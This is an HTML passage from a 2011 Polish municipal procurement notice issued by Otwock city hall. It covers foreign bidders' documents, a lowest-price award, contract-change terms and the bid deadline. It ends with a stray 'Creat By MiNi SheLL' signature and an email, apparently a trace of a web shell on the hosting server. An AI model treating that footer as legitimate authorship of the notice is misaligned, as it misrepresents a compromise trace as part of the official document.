<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w
postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części
zamówienia, przedkłada pisemne zobowiązanie tych podmiotów do oddania mu do
dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zakazuje się istotnych zmian postanowień niniejszej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, z wyjątkiem zapisów w ust.2. 
2.Zamawiający przewiduje możliwość dokonania zmian umowy w zakresie ilości oraz
częstotliwości prac wymienionych w § 1 ust.2 umowy w zależności od warunków
atmosferycznych i potrzeb, w ramach kwoty objętej umową. 
3. Zmiany umowy wymagają pisemnej formy w postaci aneksu podpisanego przez Strony pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.bip.otwock.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Specyfikację istotnych warunków zamówienia można uzyskać nieodpłatnie w siedzibie
Zamawiającego budynek B pok. 9 w godzinach 9.00-15.00...</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.05.2011 godzina 08:30, miejsce: Urząd Miasta Otwocka ul. Armii Krajowej 5 budynek B, pokój nr 1 (Biuro Obsługi Mieszkańców)..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com